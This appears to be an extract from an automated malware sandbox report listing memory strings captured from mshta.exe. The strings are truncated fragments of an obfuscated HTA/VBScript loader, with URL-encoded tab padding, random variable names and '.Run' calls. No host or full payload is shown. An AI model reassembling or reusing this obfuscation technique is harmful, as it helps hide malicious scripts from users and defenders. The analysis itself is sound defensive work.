                    Source: mshta.exe, 0000000F.00000003.461503233.0000000004771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.RUn%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                    Source: mshta.exe, 0000000F.00000003.464500007.000000000050D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465579064.0000000000510000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464786372.000000000050E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464576777.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %22TeXT/vBsCRiPT%22%3E%0ADim%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%2C%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09KaIfUUMUNRD
                    Source: mshta.exe, 00000003.00000003.412256965.00000000001AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412234342.00000000001AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr9%0@M
                    Source: mshta.exe, 00000003.00000002.417561733.0000000004DA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: t%20language%3DJavaScript%3Em%3D%27%253C%2521DOCTYPE%2520html%253E%250A%253Cmeta%2520http-equiv%253D%2522X-UA-Compatible%2522%2520content%253D%2522IE%253DEmulateIE8%2522%2520%253E%250A%253Chtml%253E%250A%253Cbody%253E%250A%253CSCrIPT%2520TYPe%253D%2522TeXT/vBsCRiPT%2522%253E%250ADim%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509%2509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtF
                    Source: mshta.exe, 0000000F.00000003.457015851.0000000003663000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SEtrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=nothinG
                    Source: mshta.exe, 00000003.00000003.417221996.000000000014E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417290381.000000000014F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416939084.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416901521.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416962919.000000000014B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.417181878.000000000014B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.RUn%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09ChR%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%28%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09%09
                    Source: mshta.exe, 0000000F.00000003.455691881.000000000056D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464456061.0000000000572000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464385595.000000000056B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.455662548.000000000056A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DimrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr,KaIfUUMUNRDDxRBgPcvjLohfZHFlsFQBKctxCTWVYEpJupuYdWNlwJilYKzujbTxSScdFWgjFpqfFjjmnnZSDgrjHWeMPrzTLQAHdZEUjuwAgujfVyTOgBVjBMiUlxXYQsAQZXFjnovDYTKMDWjGiNjqiDAAzoEVISSmtLxlrtcVjAZoNdMcJOwPeOUmHKFRPMpEpjwiZegkOlsTZpoLMwXMRQeNLH:seTrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=
                    Source: mshta.exe, 00000003.00000003.415540284.0000000003959000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.414249570.0000000003948000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417476267.0000000003959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "ontent%25253D%252522IE%25253DEmulateIE8%252522%252520%25253E%25250A%25253Chtml%25253E%25250A%25253Cbody%25253E%25250A%25253CSCrIPT%252520TYPe%25253D%252522TeXT/vBsCRiPT%252522%25253E%25250ADim%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%2
                    Source: mshta.exe, 00000003.00000003.417085267.0000000004B9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.417540027.0000000004B9F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412543918.0000000004B9D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412841727.0000000004B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: fzRkkqnFhgfsngwHSeycsHURcNpFH
                    Source: mshta.exe, 0000000F.00000002.467343154.0000000004CD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr,KaIfUUMUNRDDxRBgPcvjLohfZHFlsFQBKctxCTWVYEpJupuYdWNlwJilYKzujbTxSScdFWgjFpqfFjjmnnZSDgrjHWeMPrzTLQAHdZEUjuwAgujfVyTOgBVjBMiUlxXYQsAQZXFjnovDYTKMDWjGiNjqiDAAzoEVISSmtLxlrtcVjAZoNdMcJOwPeOUmHKFRPMpEpjwiZegkOlsTZpoLMwXMRQeNLH:seT
                    Source: mshta.exe, 0000000F.00000003.462288784.000000000495B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.461514021.000000000495B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.456773588.000000000495B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SEtrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=nothinG
                    Source: mshta.exe, 0000000F.00000003.461503233.0000000004771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 9%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509rpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr.RUn%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%252509%
                    Source: mshta.exe, 00000003.00000003.412654905.0000000004FA9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0:SEtrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=nothinG
                    Source: mshta.exe, 00000003.00000003.412256965.00000000001AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.412234342.00000000001AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416890621.00000000001B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.416874533.00000000001AA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DimrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr,KaIfUUMUNRDDxRBgPcvjLohfZHFlsFQBKctxCTWVYEpJupuYdWNlwJilYKzujbTxSScdFWgjFpqfFjjmnnZSDgrjHWeMPrzTLQAHdZEUjuwAgujfVyTOgBVjBMiUlxXYQsAQZXFjnovDYTKMDWjGiNjqiDAAzoEVISSmtLxlrtcVjAZoNdMcJOwPeOUmHKFRPMpEpjwiZegkOlsTZpoLMwXMRQeNLH:seTrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=
                    Source: mshta.exe, 0000000F.00000003.464998441.0000000004CE5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 0:SEtrpMednImblCFitFebjpTswefbCzRkkqnFhgfsngwHSeycsHURcNpFgFPlfxgVsaJIXWhVJDaszXIiXhDqjIHoQreUylkyjXJnrkdaKysWNhfNpHzmmcSHJQtQpRZjRHIkYWPYxvWiqKLhCIftUVRZTEdPnruqyGamCkmbgUeQRHtFTMQAOpyECiDEZMphnwijIZpzRxoKXbauvuZwCnJMSeoZifHYr=nothinG
                    Source: mshta.exe, 0000000F.00000003.464500007.000000000050D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.465579064.0000000000510000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464786372.000000000050E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.464576777.000000000050D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 